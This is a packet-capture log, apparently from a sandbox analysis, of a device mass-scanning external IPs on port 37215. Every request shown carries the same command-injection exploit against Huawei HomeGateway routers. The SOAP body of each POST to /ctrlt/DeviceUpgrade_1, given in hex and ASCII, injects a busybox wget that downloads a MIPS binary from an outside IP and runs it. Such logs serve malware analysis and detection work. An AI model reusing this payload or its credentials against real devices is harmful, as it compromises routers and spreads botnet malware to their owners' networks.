                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            912192.168.2.1334054156.169.133.13037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.314095974 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            913192.168.2.133281041.205.188.12837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.315258980 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            914192.168.2.1333266197.58.153.13437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.316446066 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            915192.168.2.1353822156.150.20.20337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.317666054 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            916192.168.2.1355230197.83.227.2937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.318996906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            917192.168.2.1333550197.238.127.537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.320257902 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            918192.168.2.1352094197.91.68.23437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.321633101 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            919192.168.2.134320441.177.129.12837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.322844982 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            920192.168.2.136094641.205.154.5937215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.324043989 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            921192.168.2.133831241.21.191.2337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.325207949 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 